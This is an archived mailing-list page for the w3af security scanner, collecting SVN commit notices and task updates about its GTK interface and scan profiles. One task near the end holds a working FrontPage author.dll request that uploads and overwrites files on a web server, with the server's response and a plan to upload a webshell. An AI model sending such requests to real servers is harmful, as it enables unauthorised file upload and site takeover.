w3af-svn-notify Mailing List for w3af (Page 270)
Status: Beta
Brought to you by:
andresriancho
Menu
▾
▴
w3af-svn-notify — This mailing list has a copy of the SVN Commit logs and each modified file
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
(235) |
Mar
(336) |
Apr
(280) |
May
(278) |
Jun
(159) |
Jul
(270) |
Aug
(240) |
Sep
(121) |
Oct
(110) |
Nov
(199) |
Dec
(228) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(251) |
Feb
(206) |
Mar
(115) |
Apr
(45) |
May
(27) |
Jun
(67) |
Jul
(49) |
Aug
(38) |
Sep
(10) |
Oct
(131) |
Nov
(89) |
Dec
(38) |
| 2010 |
Jan
(85) |
Feb
(71) |
Mar
(45) |
Apr
(23) |
May
(12) |
Jun
|
Jul
(11) |
Aug
(7) |
Sep
(81) |
Oct
(79) |
Nov
(165) |
Dec
(62) |
| 2011 |
Jan
(134) |
Feb
(73) |
Mar
(34) |
Apr
(63) |
May
(147) |
Jun
(43) |
Jul
(21) |
Aug
(26) |
Sep
(43) |
Oct
(34) |
Nov
(44) |
Dec
(112) |
| 2012 |
Jan
(47) |
Feb
(44) |
Mar
(72) |
Apr
(209) |
May
(54) |
Jun
(279) |
Jul
(151) |
Aug
(332) |
Sep
(39) |
Oct
(268) |
Nov
(116) |
Dec
(368) |
| 2013 |
Jan
(73) |
Feb
|
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: <and...@us...> - 2008-03-03 13:58:05
|
Revision: 782
http://w3af.svn.sourceforge.net/w3af/?rev=782&view=rev
Author: andresriancho
Date: 2008-03-03 05:57:50 -0800 (Mon, 03 Mar 2008)
Log Message:
-----------
Response message is shown in the search results.
Modified Paths:
--------------
trunk/core/ui/gtkUi/httpLogTab.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <fac...@us...> - 2008-03-03 13:48:40
|
Revision: 781
http://w3af.svn.sourceforge.net/w3af/?rev=781&view=rev
Author: facundobatista
Date: 2008-03-03 05:48:35 -0800 (Mon, 03 Mar 2008)
Log Message:
-----------
Modified the Advanced target url config button, and added
a tooltip for it (also extended the SemiStockButton to
support tooltips).
Modified Paths:
--------------
trunk/core/ui/gtkUi/entries.py
trunk/core/ui/gtkUi/pluginconfig.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <fac...@us...> - 2008-03-03 13:25:17
|
Revision: 780
http://w3af.svn.sourceforge.net/w3af/?rev=780&view=rev
Author: facundobatista
Date: 2008-03-03 05:25:04 -0800 (Mon, 03 Mar 2008)
Log Message:
-----------
Simplified the notebook tabs creation.
Modified Paths:
--------------
trunk/core/ui/gtkUi/main.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: SourceForge.net <no...@so...> - 2008-03-03 13:21:31
|
Task #146793 has been updated. Project: w3af Subproject: gtkUi - Phase 2 Summary: On play ; go to Results tab Complete: 100% Status: Closed Authority : andresriancho Assigned to: facundobatista Description: When the user hits play, the results tab should be showed. Follow-Ups: ------------------------------------------------------- Date: 2008-03-03 10:21 By: andresriancho Comment: Done by Facundo. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=146793&group_id=170274&group_project_id=55112 |
|
From: <fac...@us...> - 2008-03-03 13:00:36
|
Revision: 779
http://w3af.svn.sourceforge.net/w3af/?rev=779&view=rev
Author: facundobatista
Date: 2008-03-03 05:00:29 -0800 (Mon, 03 Mar 2008)
Log Message:
-----------
Start/Stop cycle, Clear, and Pause/Play, all work ok.
Modified Paths:
--------------
trunk/core/ui/gtkUi/entries.py
trunk/core/ui/gtkUi/main.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: SourceForge.net <no...@so...> - 2008-03-03 12:49:45
|
Task #146814 has been updated. Project: w3af Subproject: gtkUi - Phase 4 Summary: Usability ideas Complete: 0% Status: Open Authority : andresriancho Assigned to: andresriancho Description: http://download.boulder.ibm.com/ibmdl/pub/software/info/television/swtv/Rational_Software/videos/appscan.wmv ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=146814&group_id=170274&group_project_id=55676 |
|
From: <and...@us...> - 2008-03-03 09:32:16
|
Revision: 778
http://w3af.svn.sourceforge.net/w3af/?rev=778&view=rev
Author: andresriancho
Date: 2008-03-03 01:30:39 -0800 (Mon, 03 Mar 2008)
Log Message:
-----------
Ignoring pyo and pyc.
Property Changed:
----------------
trunk/core/data/profile/
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-03-02 23:33:28
|
Revision: 777
http://w3af.svn.sourceforge.net/w3af/?rev=777&view=rev
Author: andresriancho
Date: 2008-03-02 15:33:24 -0800 (Sun, 02 Mar 2008)
Log Message:
-----------
Http log tab can handle complex searches, displays data as expected, shows more useful search results... I think I'm getting to a final version
of it =)
Modified Paths:
--------------
trunk/core/ui/gtkUi/httpLogTab.py
trunk/core/ui/gtkUi/main.py
trunk/plugins/output/gtkOutput.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-03-02 21:39:19
|
Revision: 776
http://w3af.svn.sourceforge.net/w3af/?rev=776&view=rev
Author: andresriancho
Date: 2008-03-02 13:38:58 -0800 (Sun, 02 Mar 2008)
Log Message:
-----------
Renamed Findable to Searchable.
Modified Paths:
--------------
trunk/core/ui/gtkUi/messages.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-03-02 21:37:48
|
Revision: 775
http://w3af.svn.sourceforge.net/w3af/?rev=775&view=rev
Author: andresriancho
Date: 2008-03-02 13:36:14 -0800 (Sun, 02 Mar 2008)
Log Message:
-----------
Renamed Findable to Searchable.
Modified Paths:
--------------
trunk/core/ui/gtkUi/entries.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-03-02 21:35:10
|
Revision: 774
http://w3af.svn.sourceforge.net/w3af/?rev=774&view=rev
Author: andresriancho
Date: 2008-03-02 13:34:32 -0800 (Sun, 02 Mar 2008)
Log Message:
-----------
Http log tab can now render html responses with gtkhtml2 or gtkmozembed.
Modified Paths:
--------------
trunk/core/ui/gtkUi/httpLogTab.py
trunk/core/ui/gtkUi/mozillaTab.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: SourceForge.net <no...@so...> - 2008-03-02 19:07:18
|
Task #146769 has been updated. Project: w3af Subproject: gtkUi - Phase 2 Summary: Put mozillaTab inside the HTTP Log tab Complete: 85% Status: Open Authority : andresriancho Assigned to: andresriancho Description: Put mozillaTab inside the HTTP Log tab, actually, put it in the "Rendered HTML" tab that is inside the response. The mozilla object should show the rendered HTML response of the corresponding request. Follow-Ups: ------------------------------------------------------- Date: 2008-03-02 16:07 By: andresriancho Comment: Done! It works whenever it wants to though. I should find a gtkmozembed replacement. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=146769&group_id=170274&group_project_id=55112 |
|
From: SourceForge.net <no...@so...> - 2008-03-02 19:06:24
|
Task #145514 has been updated. Project: w3af Subproject: gtkUi - Phase 2 Summary: render HTML responses Complete: 80% Status: Open Authority : andresriancho Assigned to: andresriancho Description: everywhere I can look at a HTML response, I should be able to render the response! Follow-Ups: ------------------------------------------------------- Date: 2008-03-02 16:06 By: andresriancho Comment: gtkmozembed sucks. ------------------------------------------------------- Date: 2008-02-25 11:43 By: facundobatista Comment: Added functionality to buttons, and a little of cleanup. Wanted to activate back/forward buttons only when corresponds, but can_go_forward() and can_go_back() always respond false. The only thing that's still missing is to automate the library directories set up, passing the Task to Andrés for this. ------------------------------------------------------- Date: 2008-02-17 20:51 By: andresriancho Comment: I have been trying to create environment variables that affect the current process; but I have failed. It seems that the solution to this problem is to create a "bash script" that calls w3af.py; where the bash script is the one that creates the environment variables, and w3af.py is really the one that performs all the work. If you know a more elegant solution, please let me know. Problems with this solution: - Windows? (may be solved by using a python scripts that runs w3af.py) - Adding a new file ------------------------------------------------------- Date: 2008-02-14 21:07 By: andresriancho Comment: I tested the latest version on a fully updated ubuntu gutsy and it only worked if runned like this: export LD_LIBRARY_PATH=/usr/lib/firefox && export MOZILLA_FIVE_HOME=/usr/lib/firefox && ./w3af -g (as you say in the code). As you say in the code, we should work on the automatic setup of the needed variables in order to be able to run w3af gtk user interface without all the other commands. ------------------------------------------------------- Date: 2008-02-14 16:23 By: facundobatista Comment: Made it work with the gtk embedded mozilla, but it proved to be very flaky (there're some bugs that causes segmentation fault in diverse systems). Repeat: now works, but I'll test "gtkhtml2"... if this works nicely, and renders the html ok, I'll stick with it. ------------------------------------------------------- Date: 2008-02-11 22:31 By: andresriancho Comment: Also test /var/lib/python-support/python2.5/gtk-2.0/gtkhtml2.so Seems to be *really* basic, but could work when gtkmozembed is not available. Also verify dependencies if using gtkhtml2. ------------------------------------------------------- Date: 2008-02-08 20:12 By: facundobatista Comment: test gtkmozembed ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145514&group_id=170274&group_project_id=55112 |
|
From: SourceForge.net <no...@so...> - 2008-03-02 17:43:43
|
Task #146806 has been updated. Project: w3af Subproject: gtkUi - Phase 2 Summary: Help with Findable (which I renamed to Searchable) Complete: 0% Status: Open Authority : andresriancho Assigned to: facundobatista Description: I tried to remove gtk.TextView objects by Searchable objects, and I had a problem. Please contact me to tell me how to perform this task. Send me an email or something. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=146806&group_id=170274&group_project_id=55112 |
|
From: SourceForge.net <no...@so...> - 2008-03-02 17:21:49
|
Task #146770 has been updated. Project: w3af Subproject: gtkUi - Phase 2 Summary: HTTP Log explorer new look Complete: 100% Status: Closed Authority : andresriancho Assigned to: andresriancho Description: Request and response are side by side. $1 = Request shows the raw request, always. $2 = Response shows raw response and html rendered response. hbox.add($1) hbox.add($2) Follow-Ups: ------------------------------------------------------- Date: 2008-03-02 14:21 By: andresriancho Comment: Done! ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=146770&group_id=170274&group_project_id=55112 |
|
From: SourceForge.net <no...@so...> - 2008-03-02 17:20:53
|
Task #146771 has been updated. Project: w3af Subproject: gtkUi - Phase 2 Summary: Profiles in scan configuration tab Complete: 5% Status: Open Authority : andresriancho Assigned to: facundobatista Description: They should be to the left of the plugin configuration. Profiles can be copied (not cloned) from the user interface. When starting a scan, the UI should notice a change in the profile and fire up a dialog to save the profile. This task depends on "Tabs refactoring" and in Andres creating the "Profile feature" in the core. Maybe this won't happend in a short time. Follow-Ups: ------------------------------------------------------- Date: 2008-03-02 14:20 By: andresriancho Comment: Loading of profiles based on ini files already work in the consoleUi. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=146771&group_id=170274&group_project_id=55112 |
|
From: SourceForge.net <no...@so...> - 2008-03-02 17:19:35
|
Task #146805 has been updated. Project: w3af Subproject: TODO v1.10 Summary: Write profiles support for consoleUi and gtkUi Complete: 0% Status: Open Authority : andresriancho Assigned to: andresriancho Description: Write profiles support for consoleUi and gtkUi. The profile object already works, I just need to write the user interface to make it happen. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=146805&group_id=170274&group_project_id=54341 |
|
From: SourceForge.net <no...@so...> - 2008-03-02 17:18:01
|
Task #145083 has been updated. Project: w3af Subproject: TODO v1.00 Summary: scan profiles - ini file Complete: 100% Status: Closed Authority : andresriancho Assigned to: andresriancho Description: scan profiles, "fast scan", "complete scan", etc. Follow-Ups: ------------------------------------------------------- Date: 2008-03-02 14:17 By: andresriancho Comment: Done, scan profiles work. They can also be written, but that functionality is not yet implemented in the consoleUi nor gtkUi. ------------------------------------------------------- Date: 2008-02-08 22:29 By: andresriancho Comment: Must save cfg options in ini file!! ------------------------------------------------------- Date: 2007-12-31 14:47 By: andresriancho Comment: I need to do more scan profiles, but the code that handles all of it is finished. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145083&group_id=170274&group_project_id=48542 |
|
From: <and...@us...> - 2008-03-02 17:12:40
|
Revision: 773
http://w3af.svn.sourceforge.net/w3af/?rev=773&view=rev
Author: andresriancho
Date: 2008-03-02 09:12:08 -0800 (Sun, 02 Mar 2008)
Log Message:
-----------
Profiles can be written from scratch.
Modified Paths:
--------------
trunk/core/data/profile/profile.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-03-02 15:04:38
|
Revision: 772
http://w3af.svn.sourceforge.net/w3af/?rev=772&view=rev
Author: andresriancho
Date: 2008-03-02 07:04:32 -0800 (Sun, 02 Mar 2008)
Log Message:
-----------
Test files for profile management.
Modified Paths:
--------------
trunk/profiles/fast_scan.ini
trunk/scripts/script-profile-fastScan.w3af
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-03-02 15:03:07
|
Revision: 771
http://w3af.svn.sourceforge.net/w3af/?rev=771&view=rev
Author: andresriancho
Date: 2008-03-02 07:02:24 -0800 (Sun, 02 Mar 2008)
Log Message:
-----------
Added the first profile of w3af.
Added Paths:
-----------
trunk/profiles/fast_scan.ini
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-03-02 15:01:31
|
Revision: 770
http://w3af.svn.sourceforge.net/w3af/?rev=770&view=rev
Author: andresriancho
Date: 2008-03-02 07:00:58 -0800 (Sun, 02 Mar 2008)
Log Message:
-----------
Replaced the old profile system with a new one; based on .ini files. To perform this task, I had to modify the w3afCore a little,
create a new profile class and remove the old files in the profile directory.
Modified Paths:
--------------
trunk/core/controllers/w3afCore.py
trunk/extras/testEnv/webroot/permanent-xss/test-permanentxss.txt
trunk/scripts/script-profile-fastScan.w3af
trunk/w3af.e3p
trunk/w3af.e3t
Added Paths:
-----------
trunk/core/data/profile/
trunk/core/data/profile/__init__.py
trunk/core/data/profile/profile.py
Removed Paths:
-------------
trunk/profiles/__init__.py
trunk/profiles/fastScan.py
trunk/profiles/profile.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: <and...@us...> - 2008-03-01 20:20:28
|
Revision: 769
http://w3af.svn.sourceforge.net/w3af/?rev=769&view=rev
Author: andresriancho
Date: 2008-03-01 12:20:22 -0800 (Sat, 01 Mar 2008)
Log Message:
-----------
w3af is now multiuser and multisession.
Modified Paths:
--------------
trunk/core/controllers/w3afCore.py
trunk/core/data/url/handlers/localCache.py
trunk/core/data/url/xUrllib.py
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|
|
From: SourceForge.net <no...@so...> - 2008-03-01 19:01:35
|
Task #146793 has been updated. Project: w3af Subproject: gtkUi - Phase 2 Summary: On play ; go to Results tab Complete: 0% Status: Open Authority : andresriancho Assigned to: facundobatista Description: When the user hits play, the results tab should be showed. ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=146793&group_id=170274&group_project_id=55112 |
|
From: SourceForge.net <no...@so...> - 2008-03-01 19:00:35
|
Task #145813 has been updated. Project: w3af Subproject: Plugin TODO v1.00 Summary: frontpage extensions Complete: 50% Status: Open Authority : andresriancho Assigned to: sharadgana Description: Create a plugin that exploits misconfigured frontpage extensions: Upload a file: POST /_vti_bin/_vti_aut/author.dll - 200 Test if it was created: GET /i.htm - 200 Follow-Ups: ------------------------------------------------------- Date: 2008-02-24 16:43 By: andresriancho Comment: Asked for help on the users mailing list, awaiting response. ------------------------------------------------------- Date: 2008-01-30 16:41 By: andresriancho Comment: Coded the audit plugin, now I need an attack plugin that can exploit this vuln by uploading a webshell. ------------------------------------------------------- Date: 2008-01-30 15:42 By: andresriancho Comment: REQUEST ======= POST http://XXXX/_vti_bin/_vti_aut/author.dll HTTP/1.0 Host: XXXX User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;) Pragma: no-cache Content-Type: application/x-www-form-urlencoded method=put document:4.0.2.4715&service_name=&document=[document_name=index-3.htm;meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false RESPONSE ======== HTTP/1.0 200 OK Date: Wed, 30 Jan 2008 18:37:11 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET X-FrontPage-User-Name: IUSR_ECUIO012EP12 <html><head><title>vermeer RPC packet</title></head> <body> <p>method=put document:4.0.2.4715 <p>message=successfully put document 'index-3.htm' as 'c:\inetpub\wwwroot\index-3.htm' <p>document= <ul> <li>document_name=index-3.htm <li>meta_info= <ul> <li>vti_author <li>SR|IUSR_ECUIO012EP12 <li>vti_modifiedby <li>SR|IUSR_ECUIO012EP12 <li>vti_timecreated <li>TR|30 Jan 2008 18:37:12 -0000 <li>vti_timelastmodified <li>TR|30 Jan 2008 18:37:12 -0000 <li>vti_filesize <li>IR|0 <li>vti_backlinkinfo <li>VX| <li>vti_timelastwritten <li>TX|30 Jan 2008 18:37:12 -0000 </ul> </ul> </body> </html> ------------------------------------------------------- Date: 2008-01-30 15:24 By: andresriancho Comment: http://msdn2.microsoft.com/en-us/library/ms479623.aspx ------------------------------------------------------- Date: 2008-01-30 15:18 By: andresriancho Comment: http://www.packetstormsecurity.org/9910-exploits/webfolders.txt ------------------------------------------------------- Date: 2008-01-30 14:59 By: andresriancho Comment: The content posted to author.dll method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dindex.htm%3bmeta%5finfo%3d%5b%5d%5d&put%5foption=overwrite&comment=&keep%5fchecked%5fout=false ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145813&group_id=170274&group_project_id=50603 |
